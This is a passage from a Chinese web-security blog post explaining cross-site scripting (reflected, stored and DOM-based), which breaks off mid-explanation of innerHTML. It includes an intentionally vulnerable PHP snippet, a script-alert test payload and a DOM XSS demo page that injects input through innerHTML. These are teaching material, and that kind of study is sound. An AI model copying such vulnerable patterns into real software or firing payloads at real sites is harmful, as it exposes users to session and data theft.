<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="XSS"><meta name="keywords" content="websec,XSS,Redteam"><meta name="author" content="uf9n1x,1916003479@qq.com"><meta name="copyright" content="uf9n1x"><title>XSS | Uf9n1x's Blog</title><link rel="shortcut icon" href="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/avator3.JPG"><link rel="stylesheet" href="/css/index.css?version=1.9.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.1"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '6.3.0'
} </script><meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="Uf9n1x's Blog" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81%E7%AE%80%E8%BF%B0"><span class="toc-number">1.</span> <span class="toc-text">1、简述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81%E5%88%86%E7%B1%BB"><span class="toc-number">2.</span> <span class="toc-text">2、分类</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1%E3%80%81%E5%8F%8D%E5%B0%84%E5%9E%8BXSS"><span class="toc-number">2.1.</span> <span class="toc-text">1、反射型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%88%90%E5%9B%A0"><span class="toc-number">2.1.1.</span> <span class="toc-text">成因</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9E%8B%EF%BC%9A"><span class="toc-number">2.1.2.</span> <span class="toc-text">攻击模型：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2%E3%80%81%E5%AD%98%E5%82%A8%E5%9E%8BXSS"><span class="toc-number">2.2.</span> <span class="toc-text">2、存储型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%88%90%E5%9B%A0-1"><span class="toc-number">2.2.1.</span> <span class="toc-text">成因</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3%E3%80%81DOM%E5%9E%8BXSS"><span class="toc-number">2.3.</span> <span class="toc-text">3、DOM型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9E%8B"><span class="toc-number">2.3.1.</span> <span class="toc-text">攻击模型</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4%E3%80%81%E9%80%9A%E7%94%A8%E5%9E%8BXSS"><span class="toc-number">2.4.</span> <span class="toc-text">4、通用型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%88%90%E5%9B%A0-2"><span class="toc-number">2.4.1.</span> <span class="toc-text">成因</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%BE%E4%BE%8B%EF%BC%9A"><span class="toc-number">2.4.2.</span> <span class="toc-text">举例：</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#IE6%E6%88%96%E7%81%AB%E7%8B%90%E6%B5%8F%E8%A7%88%E5%99%A8%E6%89%A9%E5%B1%95%E7%A8%8B%E5%BA%8FAdobe-Acrobat%E7%9A%84%E6%BC%8F%E6%B4%9E"><span class="toc-number">2.4.2.1.</span> <span class="toc-text">IE6或火狐浏览器扩展程序Adobe Acrobat的漏洞</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Flash-Player-UXSS-%E6%BC%8F%E6%B4%9E-%E2%80%93-CVE-2011-2107"><span class="toc-number">2.4.2.2.</span> <span class="toc-text">Flash Player UXSS 漏洞 – CVE-2011-2107</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%AE%89%E5%8D%93%E7%89%88Chrome%E6%B5%8F%E8%A7%88%E5%99%A8%E6%BC%8F%E6%B4%9E"><span class="toc-number">2.4.2.3.</span> <span class="toc-text">安卓版Chrome浏览器漏洞</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5%E3%80%81%E7%AA%81%E5%8F%98%E5%9E%8BXSS"><span class="toc-number">2.5.</span> <span class="toc-text">5、突变型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%88%90%E5%9B%A0-3"><span class="toc-number">2.5.1.</span> <span class="toc-text">成因</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#mXSS%E7%A7%8D%E7%B1%BB"><span class="toc-number">2.5.2.</span> <span class="toc-text">mXSS种类</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1%E3%80%81%E5%8F%8D%E5%BC%95%E5%8F%B7%E6%89%93%E7%A0%B4%E5%B1%9E%E6%80%A7%E8%BE%B9%E7%95%8C%E5%AF%BC%E8%87%B4%E7%9A%84-mXSS"><span class="toc-number">2.5.2.1.</span> <span class="toc-text">1、反引号打破属性边界导致的 mXSS</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2%E3%80%81%E6%9C%AA%E7%9F%A5%E5%85%83%E7%B4%A0%E4%B8%AD%E7%9A%84xmlns%E5%B1%9E%E6%80%A7%E6%89%80%E5%AF%BC%E8%87%B4%E7%9A%84mXSS"><span class="toc-number">2.5.2.2.</span> <span class="toc-text">2、未知元素中的xmlns属性所导致的mXSS</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3%E3%80%81CSS%E4%B8%AD%E5%8F%8D%E6%96%9C%E7%BA%BF%E8%BD%AC%E4%B9%89%E5%AF%BC%E8%87%B4%E7%9A%84mXSS"><span class="toc-number">2.5.2.3.</span> <span class="toc-text">3、CSS中反斜线转义导致的mXSS</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#4%E3%80%81CSS%E4%B8%AD%E5%8F%8C%E5%BC%95%E5%8F%B7%E5%AE%9E%E4%BD%93%E6%88%96%E8%BD%AC%E4%B9%89%E5%AF%BC%E8%87%B4%E7%9A%84mXSS"><span class="toc-number">2.5.2.4.</span> <span class="toc-text">4、CSS中双引号实体或转义导致的mXSS</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#5%E3%80%81CSS%E5%B1%9E%E6%80%A7%E5%90%8D%E4%B8%AD%E7%9A%84%E8%BD%AC%E4%B9%89%E6%89%80%E5%AF%BC%E8%87%B4%E7%9A%84mXSS%EF%BC%9B"><span class="toc-number">2.5.2.5.</span> <span class="toc-text">5、CSS属性名中的转义所导致的mXSS；</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#6%E3%80%81%E9%9D%9EHTML%E6%96%87%E6%A1%A3%E4%B8%AD%E7%9A%84%E5%AE%9E%E4%BD%93%E7%AA%81%E5%8F%98%EF%BC%9B"><span class="toc-number">2.5.2.6.</span> <span class="toc-text">6、非HTML文档中的实体突变；</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#7%E3%80%81-HTML%E6%96%87%E6%A1%A3%E4%B8%AD%E7%9A%84%E9%9D%9EHTML%E4%B8%8A%E4%B8%8B%E6%96%87%E7%9A%84%E5%AE%9E%E4%BD%93%E7%AA%81%E5%8F%98%EF%BC%9B"><span class="toc-number">2.5.2.7.</span> <span class="toc-text">7、 HTML文档中的非HTML上下文的实体突变；</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3%E3%80%81XSS%E6%94%BB%E5%87%BB%E4%BB%A3%E7%A0%81%E5%87%BA%E7%8E%B0%E7%9A%84%E5%9C%BA%E6%99%AF"><span class="toc-number">3.</span> <span class="toc-text">3、XSS攻击代码出现的场景</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#2%E3%80%81%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE%E8%A7%A6%E5%8F%91%E8%AF%AD%E5%8F%A5"><span class="toc-number">3.0.1.</span> <span class="toc-text">2、常用标签触发语句</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2%E3%80%81%E7%BB%95%E8%BF%87%E8%BF%87%E6%BB%A4%E6%96%B9%E6%B3%95"><span class="toc-number">3.0.2.</span> <span class="toc-text">2、绕过过滤方法</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4%E3%80%81XSS-%E9%92%93%E9%B1%BC%E7%9A%84%E6%96%B9%E5%BC%8F"><span class="toc-number">4.</span> <span class="toc-text">4、XSS 钓鱼的方式</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B0%B4%E5%9D%91%E6%94%BB%E5%87%BB-Watering-Hole"><span class="toc-number">4.0.1.</span> <span class="toc-text">水坑攻击(Watering Hole)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%B1%BC%E5%8F%89%E5%BC%8F%E7%BD%91%E7%BB%9C%E9%92%93%E9%B1%BC-Spear-phishing"><span class="toc-number">4.0.2.</span> <span class="toc-text">鱼叉式网络钓鱼(Spear phishing )</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%B2%B8%E9%92%93%E6%94%BB%E5%87%BB-Whaling-Attack"><span class="toc-number">4.0.3.</span> <span class="toc-text">鲸钓攻击(Whaling Attack)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#CEO%E6%AC%BA%E8%AF%88%E6%88%96%E5%95%86%E5%8A%A1%E9%82%AE%E4%BB%B6%E6%AC%BA%E8%AF%88-BEC"><span class="toc-number">4.0.4.</span> <span class="toc-text">CEO欺诈或商务邮件欺诈(BEC)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%85%8B%E9%9A%86%E7%BD%91%E7%BB%9C%E9%92%93%E9%B1%BC"><span class="toc-number">4.0.5.</span> <span class="toc-text">克隆网络钓鱼</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%9F%9F%E6%AC%BA%E9%AA%97-Pharming"><span class="toc-number">4.0.6.</span> <span class="toc-text">域欺骗(Pharming)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#XSS-%E9%87%8D%E5%AE%9A%E5%90%91%E9%92%93%E9%B1%BC%EF%BC%88XSS-Redirect-Phishing%EF%BC%89"><span class="toc-number">4.0.7.</span> <span class="toc-text">XSS 重定向钓鱼（XSS Redirect Phishing）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#HTML%E6%B3%A8%E5%85%A5%E5%BC%8F%E9%92%93%E9%B1%BC%EF%BC%88XSS-HTML-Inject-Phishing%EF%BC%89"><span class="toc-number">4.0.8.</span> <span class="toc-text">HTML注入式钓鱼（XSS HTML Inject Phishing）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#XSS-%E8%B7%A8%E6%A1%86%E6%9E%B6%E9%92%93%E9%B1%BC%EF%BC%88Iframe-Phishing%EF%BC%89"><span class="toc-number">4.0.9.</span> <span class="toc-text">XSS 跨框架钓鱼（Iframe Phishing）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Flash-%E9%92%93%E9%B1%BC%EF%BC%88Flash-Phishing%EF%BC%89"><span class="toc-number">4.0.10.</span> <span class="toc-text">Flash 钓鱼（Flash Phishing）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%AB%98%E7%BA%A7%E9%92%93%E9%B1%BC%E6%8A%80%E6%9C%AF"><span class="toc-number">4.0.11.</span> <span class="toc-text">高级钓鱼技术</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8A%AB%E6%8C%81%E9%93%BE%E6%8E%A5%E7%9A%84-onclick-%E4%BA%8B%E4%BB%B6"><span class="toc-number">4.0.12.</span> <span class="toc-text">劫持链接的 onclick 事件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%9B%91%E5%90%AC%E9%94%AE%E7%9B%98-%E7%9A%84onkeydown-%E4%BA%8B%E4%BB%B6"><span class="toc-number">4.0.13.</span> <span class="toc-text">监听键盘 的onkeydown 事件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#JavaScript"><span class="toc-number">4.0.14.</span> <span class="toc-text">JavaScript</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5%E3%80%81%E5%8D%B1%E5%AE%B3"><span class="toc-number">5.</span> <span class="toc-text">5、危害</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6%E3%80%81%E9%98%B2%E5%BE%A1%E6%96%B9%E6%B3%95"><span class="toc-number">6.</span> <span class="toc-text">6、防御方法</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E9%A2%84%E9%98%B2-DOM-%E5%9E%8B-XSS-%E6%94%BB%E5%87%BB"><span class="toc-number">6.1.</span> <span class="toc-text">1.预防 DOM 型 XSS 攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E8%BE%93%E5%85%A5%E8%BF%87%E6%BB%A4"><span class="toc-number">6.2.</span> <span class="toc-text">2.输入过滤</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E5%89%8D%E7%AB%AF%E6%B8%B2%E6%9F%93%E5%88%86%E7%A6%BB%E4%BB%A3%E7%A0%81%E4%B8%8E%E6%95%B0%E6%8D%AE"><span class="toc-number">6.3.</span> <span class="toc-text">3.前端渲染分离代码与数据</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E6%8B%BC%E6%8E%A5HTML%E6%97%B6%E5%AF%B9%E5%85%B6%E8%BF%9B%E8%A1%8C%E8%BD%AC%E4%B9%89"><span class="toc-number">6.4.</span> <span class="toc-text">4.拼接HTML时对其进行转义</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5%E3%80%81%E4%B8%80%E8%88%AC%E6%96%B9%E6%B3%95%EF%BC%9A"><span class="toc-number">6.5.</span> <span class="toc-text">5、一般方法：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7%E3%80%81xss%E5%B9%B3%E5%8F%B0%E6%90%AD%E5%BB%BA"><span class="toc-number">7.</span> <span class="toc-text">7、xss平台搭建</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/avator3.JPG"></div><div class="author-info__name text-center">uf9n1x</div><div class="author-info__description text-center">websec</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/uf9n1x">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">45</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">35</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">32</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Some links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.cnblogs.com/uf9n1x/">博客园</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.yuque.com/uf9n1x">语雀</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://music.163.com/">Music</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1313934826.cos.ap-chengdu.myqcloud.com/normal-images/psc.png#https://s1.ax1x.com/2023/04/14/p9Sd0ns.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Uf9n1x's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">归档</a><a class="site-page" href="/categories">分类</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">XSS</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2023-04-16</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/websec/">websec</a><i class="fa fa-angle-right" aria-hidden="true"></i><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/websec/Redteam/">Redteam</a><i class="fa fa-angle-right" aria-hidden="true"></i><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/websec/Redteam/websec/">websec</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">6.8k</span><span class="post-meta__separator">|</span><span>阅读时长: 25 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>这篇文章介绍XSS漏洞原理。</p>
<span id="more"></span>

<h2 id="1、简述"><a href="#1、简述" class="headerlink" title="1、简述"></a>1、简述</h2><p>XSS攻击通常指的是通过利用网页开发时留下的漏洞，<strong>通过巧妙的方法注入恶意指令代码到网页</strong>，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java、 VBScript、 LiveScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后，攻击者可能得到包括但不限于更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。</p>
<p><strong>原理：用户输入的数据当做HTML代码拼接到程序代码中去执行恶意的JS语句，也即是注入</strong></p>
<h2 id="2、分类"><a href="#2、分类" class="headerlink" title="2、分类"></a>2、分类</h2><p><strong>反射型（非持久型）XSS</strong>、<strong>存储型（持久型）XSS</strong>、<strong>DOM型XSS</strong>、<strong>通用型XSS</strong>、<strong>突变型XSS</strong></p>
<h3 id="1、反射型XSS"><a href="#1、反射型XSS" class="headerlink" title="1、反射型XSS"></a>1、反射型XSS</h3><p>反射型跨站脚本（Reflected Cross-Site Scripting）是最常见，也是使用最广的一种，只是简单的把用户输入的数据从服务器反射给用户浏览器，hacker可将恶意脚本附加到 URL 地址的参数中。反射型 XSS 的利用一般是攻击者通过特定手法（如电子邮件），诱使用户去访问一个包含恶意代码的 URL，当受害者点击这些专门设计的链接的时候，<strong>恶意代码会直接在受害者主机上的浏览器执行</strong>。此类 XSS 通常出现在网站的<strong>搜索栏、用户登录口</strong>等地方，<strong>常用来窃取客户端 Cookies 或进行钓鱼欺骗</strong></p>
<p>举例来说，当一个网站的代码中包含类似下面的语句:</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token operator">&lt;</span>?php 
echo <span class="token string">"&lt;p>hello,$_GET['user']&lt;/p>"</span><span class="token punctuation">;</span> 
?<span class="token operator">></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>如果未做防范XSS，用户名设为</p>
<pre class="line-numbers language-js"><code class="language-js"><span class="token operator">&lt;</span>script<span class="token operator">></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>则会执行预设好的JavaScript代码。</p>
<h4 id="成因"><a href="#成因" class="headerlink" title="成因"></a>成因</h4><p>当用户的输入或者一些用户可控参数未经处理地输出到页面上，就容易产生XSS漏洞,说白了也就是一种注入。主要场景有以下几种：</p>
<pre class="line-numbers language-html"><code class="language-html">将不可信数据插入到HTML标签之间时；// 例如div, p, td；
将不可信数据插入到HTML属性里时；// 例如：<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">width</span><span class="token attr-value"><span class="token punctuation">=</span>$INPUT</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">></span></span>
将不可信数据插入到SCRIPT里时；// 例如：<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span><span class="token script language-javascript"><span class="token keyword">var</span> message <span class="token operator">=</span> ” $INPUT “<span class="token punctuation">;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span>
还有插入到Style属性里的情况，同样具有一定的危害性；// 例如<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span> <span class="token attr-name">style</span><span class="token attr-value"><span class="token punctuation">=</span>”</span> <span class="token attr-name">property</span> <span class="token attr-name">:</span> <span class="token attr-name">$INPUT</span> <span class="token attr-name">”</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
将不可信数据插入到HTML URL里时，// 例如：&lt;a href=”[http://www.abcd.com?param=](http://www.ccc.com/?param=) $INPUT ”><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>a</span><span class="token punctuation">></span></span>
使用富文本时，没有使用XSS规则引擎进行编码过滤。
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="攻击模型："><a href="#攻击模型：" class="headerlink" title="攻击模型："></a>攻击模型：</h4><p> 反射型XSS通常出现在搜索等功能中，需要被攻击者点击对应的链接才能触发，且受到XSS Auditor(chrome内置的XSS保护)、NoScript等防御手段的影响较大，所以它的危害性较存储型要小。  </p>
<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304161706545.png" alt="img"></p>
<h3 id="2、存储型XSS"><a href="#2、存储型XSS" class="headerlink" title="2、存储型XSS"></a>2、存储型XSS</h3><p>持久型跨站脚本（Persistent Cross-Site Scripting）也等同于存储型跨站脚本（Stored Cross-Site Scripting）。此类 XSS <strong>不需要用户单击特定 URL 就能执行跨站脚本</strong>，攻击者事先将恶意代码上传或储存到漏洞服务器中，只要受害者浏览包含此恶意代码的页面就会执行恶意代码。<strong>持久型 XSS 一般出现在博客评论，用户评论，留言板，聊天室，HTML 电子邮件，wikis，和其他的许多地方。一旦用户访问受感染的页，执行是自动的，恶意脚本存储到客户端或者服务端的数据库中</strong></p>
<h4 id="成因-1"><a href="#成因-1" class="headerlink" title="成因"></a>成因</h4><p> 存储型XSS漏洞的成因与反射型的根源类似，不同的是恶意代码会被保存在服务器中，导致其它用户（前端）和管理员（前后端）在访问资源时也会执行了恶意代码，用户访问服务器-跨站链接-返回跨站代码。  </p>
<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304161706829.png" alt="img"></p>
<h3 id="3、DOM型XSS"><a href="#3、DOM型XSS" class="headerlink" title="3、DOM型XSS"></a>3、DOM型XSS</h3><p>DOM型XSS是基于DOM文档对象模型的。对于浏览器来说，DOM文档就是一份XML文档，当有了这个标准的技术之后，通过JavaScript就可以轻松的访问DOM。当确认客户端代码中有DOM型XSS漏洞时，诱使(钓鱼)一名用户访问自己构造的URL，利用步骤和反射型很类似，但是唯一的区别就是，<strong>构造的URL参数不用发送到服务器端，可以达到绕过WAF、躲避服务端的检测效果。</strong></p>
<p>对于什么是DOM,k可以看看这篇：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_68870440/article/details/125427082?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-125427082-blog-125185693.pc_relevant_3mothn_strategy_recovery&amp;spm=1001.2101.3001.4242.1&amp;utm_relevant_index=3">https://blog.csdn.net/m0_68870440/article/details/125427082?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-125427082-blog-125185693.pc_relevant_3mothn_strategy_recovery&amp;spm=1001.2101.3001.4242.1&amp;utm_relevant_index=3</a></p>
<h4 id="攻击模型"><a href="#攻击模型" class="headerlink" title="攻击模型"></a>攻击模型</h4><pre class="line-numbers language-html"><code class="language-html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>html</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>head</span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>title</span><span class="token punctuation">></span></span>DOM Based XSS Demo<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>title</span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span><span class="token script language-javascript">
        <span class="token keyword">function</span> <span class="token function">xsstest</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token comment" spellcheck="true">//xsstest函数</span>
        <span class="token punctuation">{</span>
        <span class="token keyword">var</span> str <span class="token operator">=</span> document<span class="token punctuation">.</span><span class="token function">getElementById</span><span class="token punctuation">(</span><span class="token string">"input"</span><span class="token punctuation">)</span><span class="token punctuation">.</span>value<span class="token punctuation">;</span>
        document<span class="token punctuation">.</span><span class="token function">getElementById</span><span class="token punctuation">(</span><span class="token string">"output"</span><span class="token punctuation">)</span><span class="token punctuation">.</span>innerHTML <span class="token operator">=</span> "<span class="token operator">&lt;</span>img
        src<span class="token operator">=</span><span class="token string">'"+str+"'</span><span class="token operator">></span><span class="token operator">&lt;</span><span class="token operator">/</span>img<span class="token operator">></span>"<span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
        </span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>head</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>body</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>output<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>text<span class="token punctuation">"</span></span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>input<span class="token punctuation">"</span></span> <span class="token attr-name">size</span><span class="token attr-value"><span class="token punctuation">=</span>50</span> <span class="token attr-name">value</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span><span class="token punctuation">"</span></span> <span class="token punctuation">/></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>button<span class="token punctuation">"</span></span> <span class="token attr-name">value</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>submit<span class="token punctuation">"</span></span> <span class="token attr-name">onclick</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>xsstest()<span class="token punctuation">"</span></span> <span class="token punctuation">/></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>body</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>html</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p> 在这段代码中，submit按钮的onclick事件调用了xsstest()函数。而在xsstest()中，修改了页面的DOM节点，通过innerHTML把一段用户数据当作HTML写入到页面中，造成了DOM Based XSS。</p>
<p><strong>这里不得不说明一下这个：innerHTML是什么：</strong></p>
